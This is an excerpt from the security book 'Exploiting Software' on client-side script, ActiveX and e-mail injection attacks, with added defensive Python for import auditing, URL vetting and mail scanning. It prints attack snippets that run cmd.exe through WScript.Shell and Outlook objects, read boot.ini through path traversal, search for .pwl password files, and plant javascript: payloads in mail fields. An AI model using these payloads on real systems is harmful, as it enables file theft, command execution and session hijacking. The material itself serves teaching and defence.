
Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Client Scripts and Malicious Code

"The 'IloveYou' virus contaminated over 1 million computers in 5 hours."[4]

[4] US Office of the Undersecretary of Defense, February 2001.

Client programs such as Microsoft Excel, Word, or Internet Explorer are capable of executing code that is downloaded from untrusted sources. Because of this, they create an environment in which viruses and worms can thrive. In fact, until recently, the fastest spreading and most widespread viruses of all time all exploited scripting problems: Concept (1997), Melissa (1999), IloveYou (2000), NIMDA (2002). The key to attacking a client program is identifying the local objects and API calls that a client script can access. Many of these library functions can be exploited to gain access to the local system.

Consider a target network of a few thousand nodes. Realize that many of these systems are running the same client software, the same version of Windows, the same e-mail clients, and so forth. This creates a monoculture environment in which a single worm can wipe out (or, worse yet, silently own) a substantial percentage of the target network. Using reverse engineering tricks (described in Chapter 3), an attacker can identify weak library calls and develop a virus that will install backdoors, e-mail sniffers, and database attack tools.

* Attack Example: Excel Host() Function

The Host() function, when embedded in office documents, can be used in an attack.

* Attack Example: WScript.Shell

The wscript engine is a useful attack target that can access the Windows registry and run shell commands:

Myobj = new ActiveXObject("WScript.Shell");
Myobj.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /A /P /S");

* Attack Example: Scripting.FileSystemObject

The FileSystemObject is very commonly used by scripted worms. It can be used to manipulate both ASCII and binary files on the system.

* Attack Example: Wscript.Network

The Wscript network call can be used to map network drives.

* Attack Example: Scriptlet.TypeLib

The TypeLib scriptlet can be used to create files. An attacker can use this to place script copies in certain locations on network drives so they will be executed on reboot.

Auditing for Weak Local Calls

A good way to begin applying this technique is to look for controls that access the local system or the local network, including local system calls. A short and incomplete search of the registry under Windows XP reveals some of the DLLs that are responsible for servicing interesting scripting calls:

scrrun.dll
    Scripting.FilesystemObject
    Scripting.Encoder

wbemdisp.dll
    WbemScripting.SWbemDateTime.1
    WbemScripting.SWbemObjectPath.1
    WbemScripting.SWbemSink.1
    WbemScripting.SWbemLocator.1

wshext.dll
    Scripting.Signer

Running a dependency tree analysis on scrrun.dll reveals the inherent capability of the DLL. In other words, such an exercise tells what scripts are able to do given the right instructions. The "depends" tool is useful for determining what calls can be made from a particular DLL. The tool comes with the standard development tools supplied by Microsoft (Figure 5-2).

Figure 5-2. A screen shot of the "depends" tool results for the SCRRUN DLL. Looking at the dependencies reveals information that can be leveraged in an attack.

Using depends, we can determine that SCRRUN uses the following functions from imported DLLs:

ADVAPI32.DLL
    IsTextUnicode
    RegCloseKey
    RegCreateKeyA
    RegDeleteKeyA
    RegEnumKeyA
    RegOpenKeyA
    RegOpenKeyExA
    RegQueryInfoKeyA
    RegQueryValueA
    RegSetValueA
    RegSetValueExA

KERNEL32.DLL
    CloseHandle
    CompareStringA
    CompareStringW
    CopyFileA
    CopyFileW
    CreateDirectoryA
    CreateDirectoryW
    CreateFileA
    CreateFileW
    DeleteCriticalSection
    DeleteFileA
    DeleteFileW
    EnterCriticalSection
    FileTimeToLocalFileTime
    FileTimeToSystemTime
    FindClose
    FindFirstFileA
    FindFirstFileW
    FindNextFileA
    FindNextFileW
    FreeLibrary
    GetDiskFreeSpaceA
    GetDiskFreeSpaceW
    GetDriveTypeA
    GetDriveTypeW
    GetFileAttributesA
    GetFileAttributesW
    GetFileInformationByHandle
    GetFileType
    GetFullPathNameA
    GetFullPathNameW
    GetLastError
    GetLocaleInfoA
    GetLogicalDrives
    GetModuleFileNameA
    GetModuleHandleA
    GetProcAddress
    GetShortPathNameA
    GetShortPathNameW
    GetStdHandle
    GetSystemDirectoryA
    GetSystemDirectoryW
    GetTempPathA
    GetTempPathW
    GetTickCount
    GetUserDefaultLCID
    GetVersion
    GetVersionExA
    GetVolumeInformationA
    GetVolumeInformationW
    GetWindowsDirectoryA
    GetWindowsDirectoryW
    InitializeCriticalSection
    InterlockedDecrement
    InterlockedIncrement
    LCMapStringA
    LCMapStringW
    LeaveCriticalSection
    LoadLibraryA
    MoveFileA
    MoveFileW
    MultiByteToWideChar
    ReadFile
    RemoveDirectoryA
    RemoveDirectoryW
    SetErrorMode
    SetFileAttributesA
    SetFileAttributesW
    SetFilePointer
    SetLastError
    SetVolumeLabelA
    SetVolumeLabelW
    WideCharToMultiByte
    WriteConsoleW
    WriteFile
    lstrcatA
    lstrcatW
    lstrcpyA
    lstrcpyW
    lstrlenA

USER32.DLL
    CharNextA
    LoadStringA
    wsprintfA

OLE32.DLL
    CLSIDFromProgID
    CLSIDFromString
    CoCreateInstance
    CoGetMalloc
    StringFromCLSID
    StringFromGUID2

OLEAUT32.DLL (imported by ordinal)
    2 (0x0002)
    4 (0x0004)
    5 (0x0005)
    6 (0x0006)
    7 (0x0007)
    9 (0x0009)
    10 (0x000A)
    15 (0x000F)
    16 (0x0010)
    21 (0x0015)
    22 (0x0016)
    72 (0x0048)
    100 (0x0064)
    101 (0x0065)
    102 (0x0066)
    147 (0x0093)
    161 (0x00A1)
    162 (0x00A2)
    165 (0x00A5)
    166 (0x00A6)
    183 (0x00B7)
    186 (0x00BA)
    192 (0x00C0)
    216 (0x00D8)

MSVCRT.DLL
    ??2@YAPAXI@Z
    ??3@YAXPAX@Z
    __dllonexit
    _adjust_fdiv
    _initterm
    _ismbblead
    _itoa
    _itow
    _mbsdec
    _mbsicmp
    _mbsnbcpy
    _mbsnbicmp
    _onexit
    _purecall
    _wcsicmp
    _wcsnicmp
    free
    isalpha
    iswalpha
    malloc
    memmove
    rand
    sprintf
    srand
    strncpy
    tolower
    toupper
    wcscmp
    wcscpy
    wcslen
    wcsncpy

VERSION.DLL
    GetFileVersionInfoA
    GetFileVersionInfoSizeA
    GetFileVersionInfoSizeW
    GetFileVersionInfoW
    VerQueryValueA
    VerQueryValueW

This list is interesting because it shows what scrrun.dll might be able to do on behalf of a script. Not all the calls listed here are necessarily exposed directly to a script, but many of them are. Think in terms of the lock-picking analogy we discuss in previous chapters. A script provides one way of picking the logical locks between you and the library call you're after. Many of these library calls will be exploitable from a script, given the right circumstances.
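As an added example (not from the book), the following Python reads a PE file's import table, which is the information the depends tool shows for scrrun.dll; parse_imports() handles PE32 and PE32+ images including imports by ordinal (as the OLEAUT32 entries above are), and build_sample_dll() fabricates a minimal PE32 image from constructed DLL and function names so the example runs without a real DLL on disk.

```python
import struct


def parse_imports(data):
    """Return {dll_name: [imported symbol, ...]} from the bytes of a PE32/PE32+ file."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size = struct.unpack_from("<HHIIIH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    # Data directories begin at +96 (PE32) or +112 (PE32+); entry 1 is the import table.
    imp_rva = struct.unpack_from("<I", data, opt + (112 if pe32plus else 96) + 8)[0]
    # Section table, needed to translate RVAs into file offsets.
    sections = []
    for i in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))

    def rva2off(rva):
        for va, size, raw_ptr in sections:
            if va <= rva < va + size:
                return raw_ptr + (rva - va)
        raise ValueError("RVA 0x%x is outside every section" % rva)

    def cstr(off):
        return data[off:data.index(b"\0", off)].decode("ascii")

    thunk_fmt, ordinal_flag = ("<Q", 1 << 63) if pe32plus else ("<I", 1 << 31)
    imports, off = {}, rva2off(imp_rva)
    while True:
        ilt_rva, _, _, name_rva, iat_rva = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0:                   # an all-zero descriptor ends the table
            break
        dll, symbols = cstr(rva2off(name_rva)), []
        toff = rva2off(ilt_rva or iat_rva)  # lookup table, or the IAT when unbound
        while True:
            entry = struct.unpack_from(thunk_fmt, data, toff)[0]
            if entry == 0:
                break
            if entry & ordinal_flag:        # import by ordinal, as with OLEAUT32 above
                symbols.append("ordinal %d" % (entry & 0xFFFF))
            else:                           # hint/name entry: 2-byte hint, then the name
                symbols.append(cstr(rva2off(entry) + 2))
            toff += struct.calcsize(thunk_fmt)
        imports[dll] = symbols
        off += 20
    return imports


def build_sample_dll(imports, sec_va=0x1000):
    """Fabricate a minimal PE32 DLL whose only section is an import table (test input)."""
    body = bytearray((len(imports) + 1) * 20)  # import descriptors, filled in at the end
    descriptors = []
    for dll, funcs in imports.items():
        thunks = []
        for f in funcs:
            if isinstance(f, int):                 # ordinal import
                thunks.append(0x80000000 | f)
            else:                                  # hint/name import
                thunks.append(sec_va + len(body))
                body += struct.pack("<H", 0) + f.encode() + b"\0"
                body += b"\0" * (len(body) % 2)
        name_rva = sec_va + len(body)
        body += dll.encode() + b"\0"
        body += b"\0" * (-len(body) % 4)
        ilt_rva = sec_va + len(body)
        body += b"".join(struct.pack("<I", t) for t in thunks) + b"\0" * 4
        iat_rva = sec_va + len(body)
        body += b"".join(struct.pack("<I", t) for t in thunks) + b"\0" * 4
        descriptors.append((ilt_rva, name_rva, iat_rva))
    for i, (ilt, name, iat) in enumerate(descriptors):
        struct.pack_into("<IIIII", body, i * 20, ilt, 0, 0, name, iat)
    raw_size = -(-len(body) // 0x200) * 0x200
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                          # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x2102)  # COFF header
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                           # PE32 magic
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200)             # section / file alignment
    struct.pack_into("<I", hdr, opt + 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 104, sec_va, (len(imports) + 1) * 20)  # import dir
    sec = opt + 224                                                   # first section header
    hdr[sec:sec + 8] = b".idata\0\0"
    struct.pack_into("<IIII", hdr, sec + 8, len(body), sec_va, raw_size, 0x200)
    return bytes(hdr) + bytes(body).ljust(raw_size, b"\0")


# Constructed sample modelled on the kinds of entries depends lists for scrrun.dll.
SAMPLE_IMPORTS = {"KERNEL32.DLL": ["CreateFileA", "DeleteFileW", "WriteFile"],
                  "ADVAPI32.DLL": ["RegSetValueExA"], "OLEAUT32.DLL": [2, 4]}
SAMPLE_DLL = build_sample_dll(SAMPLE_IMPORTS)
```

To audit a real module, pass the file's bytes to parse_imports() and review the file, registry and process-related entries the way the list above is read.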

Web Browsers and ActiveX

The modern Web browser has evolved into an execution sandbox for mobile code. The browser is thus a fat client that runs largely untrusted code. This might not be such a big problem, except that the browser is usually not properly segmented from the host OS. Even "secure" mobile code systems, like Java VMs, have histories of flaws that allowed attackers to circumvent sandbox security.[5]

[5] For more on mobile code security, sandboxing, and related security problems, see Securing Java [McGraw and Felten, 1998].

In the case of Microsoft technology, the problem is many times worse than with other systems. The COM/DCOM technology (sometimes packaged as ActiveX, and most recently referred to as .NET) exposes enormous couplings between host system services and potentially malicious code. Exploits have been unearthed by the dozens in the layer between the browser and ActiveX. Many of these vulnerabilities allow scripts to access the local file system. To understand the depth of this problem, take any ActiveX function that accepts a URL and supply a local file instead. Many of the relative path problems that we outlined in previous chapters can be directly applied. Attempts to encode the filename in various ways combined with relative path traversal will yield successful exploits. ActiveX is a fertile hunting ground for exploits.

In a way, the layer between scripts and the OS provides yet another trust zone where classic input attacks can be launched. As a result, most of the generic tricks that apply to server input (see Chapter 4) can be applied here as well, with the twist being that this time we target the client.

Attack Pattern: Passing Local Filenames to Functions That Expect a URL

Use local filenames with functions that expect to consume a URL. Find interesting connections.

* Attack Example: Local Filenames and the ActiveX Preloader

Microsoft ships a module with Internet Explorer called the preloader. This module can be accessed from script to read files on the local hard drive. The Javascript code follows:

<script LANGUAGE="JavaScript">
<!--
function attack()
{
    preloader.Enable=0;
    preloader.URL = "c:\\boot.ini";
    preloader.Enable=1;
}
//-->
</script>
<script LANGUAGE="JavaScript" FOR="preloader" EVENT="Complete()">
// We are here if we found the file.
</script>
<a href="javascript:attack()">click here to get boot.ini file</a>

* Attack Example: The Internet Explorer GetObject() Call

Internet Explorer includes a function call that can be used in any number of attacks:

DD=GetObject("http://"+location.host+"/../../../../../../boot.ini","htmlfile");
DD=GetObject("c:\\boot.ini","htmlfile");

Access the text of a target file using

DD.body.innerText

* Attack Example: The ixsso.query ActiveX Object

Yet another ActiveX object suffers from similar problems:

nn=new ActiveXObject("ixsso.query");
nn.Catalog="System";
nn.query='@filename = *.pwl ';

ActiveX makes a potent ally to attackers.
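As an added example (not from the book), a guard for a function that is meant to consume only a remote URL, covering the local filename, file: scheme, encoded and relative-path traversal tricks this attack pattern relies on; is_remote_url() and fetch_only_remote() are hypothetical names, and no network access takes place.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}


def is_remote_url(url):
    """True only for an absolute http(s) URL whose path cannot escape the site root."""
    if any(not 0x20 <= ord(ch) < 0x7F for ch in url):
        return False                  # control bytes or raw non-ASCII: reject outright
    parts = urlsplit(url)             # scheme and host come back lower-cased
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False                  # drops c:\..., file:, about:, javascript:, http:///c:/...
    path = parts.path
    for _ in range(3):                # undo %2e%2e and double-encoded %252e%252e forms
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = path.replace("\\", "/").split("/")
    return ".." not in segments       # "/../../boot.ini" style traversal is rejected


def fetch_only_remote(url, fetch):
    """Wrap a URL-consuming function so it is only ever handed a vetted remote URL."""
    if not is_remote_url(url):
        raise ValueError("refusing non-remote or traversing URL: %r" % url)
    return fetch(url)
```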

E-mail Injection

Pervasive messaging systems also present opportunities to extend the idea of client-side injection. Messaging systems in general are designed to take a block of data and place it in a target environment where it can then be interpreted. Consider pagers, SMS messaging, and e-mail systems. An attacker can easily explore the input space of a message by injecting character sequences and observing the result. In the case of e-mail, the client program may be very complex, at least as complex as a Web browser interface. This means that the same tricks that can be applied to a client-side injection against a browser terminal can also be applied in an e-mail message.

The content to be injected into a message may exist in any part of the mail header or body. This may include the e-mail subject, recipient field, or even the resolved DNS name of a host.

Attack Pattern: Meta-characters in E-mail Header

Meta-characters can be supplied in an e-mail header and may be consumed by the client software to interesting effect.

* Attack Example: Meta-characters and the FML Mailing List Archive[6]

[6] Discovery of this problem is attributed to Wichert Akkerman (wichert@wiggy.net).

When the FML application generates an archive index of stored messages, it blindly includes the subject header and fails to strip any embedded script or HTML codes. The result is an index report that, when viewed in a browser terminal, includes the attacker-supplied script codes.

Similar attacks can be carried out against the Subject field, the FROM field (especially with HTML), the TO field (HTML again), and the mail body itself.

* Attack Example: Outlook XP and HTML on Reply or Forward

Outlook XP will run HTML embedded in an e-mail body when the user chooses reply or forward. The following HTML snippet is interesting to try:

<OBJECT id=WebBrowser1 height=150 width=300
    classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location"
    VALUE="about:/dev/random<script>while (42) alert('Warning – this is a script attack!')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>

* Attack Example: The Outlook Application Object

Microsoft's Outlook application object provides a powerful control that exposes system-level command execution. This object is used by many virus writers to create a propagation vector:

NN = MySession.Session.Application.CreateObject("Wscript.Shell");
NN.Run("c:\\WINNT\\SYSTEM32\\CMD.EXE /C dir");

Visual Basic can also be used to access this functionality. Note that VB access to Microsoft problems is common.

Set myApp = CreateObject("Outlook.Application")
myApp.CreateObject("Wscript.Shell")

* Attack Example: Microsoft Outlook View Control

The "selection" property of the Outlook View Control exposes the user's e-mail to a script, as well as exposes the Outlook Application Object. To create an Outlook View Control and a script that lists the contents of the C: drive, try this:

<object
class>
<param name="folder" value="Inbox">
</object>

<script>
function myfunc()
{
    // Do something evil here.
    mySelection = o1.object.selection;
    myItem = mySelection.Item(1);
    mySession = myItem.Session.Application.CreateObject("WScript.Shell");
    mySession.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("myfunc()",1000);
</script>

* Attack Example: Horde IMP

A remote user can create a malicious HTML-based e-mail message such that when the message is viewed, arbitrary code is executed by the target user's browser. The code will appear to originate from the mail server and will thus be able to access the user's Web mail cookies and forward those cookies to another location. Because the e-mail is being viewed from a trusted server (you trust your e-mail server, right?) the browser trusts the e-mail server. This includes extending trust to any embedded script. Clearly arbitrary e-mail messages themselves should not be trusted. This is a serious flaw in the design of the product.

Using the right kind of scripts an attacker can, for example, steal the cookies associated with a Web session. In many cases, if an attacker gets the right cookies, the same rights and privileges as the original user will be transferred to the attacker. Thus, after obtaining the cookies, the attacker can "impersonate" the original user and read their e-mail.

* Attack Example: Baltimore Technologies MailSweeper

At one time, a remote user could place Javascript or VBscript within certain HTML tags to circumvent the filtering that Baltimore's MailSweeper uses. For example, the following two HTML tags were not properly filtered by the product:

<A HREF="javascript:alert('This is an attack')">Click here</A>
<IMG SRC="javascript:alert('This is an attack')">

* Attack Example: Hotmail Java Tag Filtering

In an older version of Hotmail, users could embed script in the FROM field when they sent e-mail. This would not be filtered. For example, an attack might involve pasting the following script into the FROM field:

a background=javascript:alert('this is an attack') @hotmail.com
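As an added example (not from the book), a gateway-side scan that flags script-bearing HTML in mail headers and body, exercised against constructed messages modelled on the FROM-field, HREF/SRC and OBJECT cases described in this section; scan_message() and find_active_content() are hypothetical names, and the messages and CLSID placeholder are constructed.

```python
import html
import re
from email import message_from_string

# Each check names the class of active content it detects. Matching happens after
# HTML entity decoding and control-byte removal, so "&#106;avascript:" and
# "java\tscript:" are seen the way a lenient client would render them.
CHECKS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("javascript: URL", re.compile(
        r"\b(?:href|src|background|value)\s*=\s*[\"']?\s*javascript\s*:", re.I)),
    ("ActiveX object", re.compile(r"<\s*object\b[^>]*\bclassid\s*=", re.I)),
]


def find_active_content(text):
    """Names of the checks that match, in CHECKS order."""
    normalized = re.sub(r"[\x00-\x1f]", "", html.unescape(text))
    return [name for name, pattern in CHECKS if pattern.search(normalized)]


def scan_message(raw):
    """Map each offending location (a header name or 'body') to the checks it triggered."""
    msg = message_from_string(raw)
    findings = {}
    for header, value in msg.items():             # every header, not only From/To/Subject
        hits = find_active_content(value)
        if hits:
            findings.setdefault(header, []).extend(hits)
    for part in msg.walk():                       # every leaf part, HTML or not
        if part.is_multipart():
            continue
        text = part.get_payload(decode=True).decode("utf-8", "replace")
        hits = find_active_content(text)
        if hits:
            findings.setdefault("body", []).extend(hits)
    return findings


# Constructed messages modelled on the FROM-field, HREF/SRC and OBJECT cases above.
FROM_FIELD_MESSAGE = (
    "From: a background=javascript:alert('this is an attack') @hotmail.com\r\n"
    "To: victim@example.com\r\nSubject: hello\r\n\r\nNothing to see in the body.\r\n")
SUBJECT_MESSAGE = (
    "From: sender@example.com\r\nTo: list@example.com\r\n"
    "Subject: Agenda <SCRIPT>alert(document.cookie)</SCRIPT>\r\n\r\nSee subject.\r\n")
BODY_MESSAGE = (
    "From: sender@example.com\r\nTo: victim@example.com\r\nSubject: links\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<A HREF=\"javascript:alert('This is an attack')\">Click here</A>\r\n"
    "<IMG SRC=\"&#106;avascript:alert('encoded')\">\r\n"
    "<OBJECT id=WebBrowser1 classid=CLSID:00000000-PLACEHOLDER-GUID>\r\n"
    "<PARAM NAME=\"Location\" VALUE=\"about:<script>alert(1)</script>\"></OBJECT>\r\n")
CLEAN_MESSAGE = (
    "From: sender@example.com\r\nTo: victim@example.com\r\nSubject: Quarterly report\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<p>See <a href=\"https://www.example.com/q1\">the report</a>.</p>\r\n")
```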
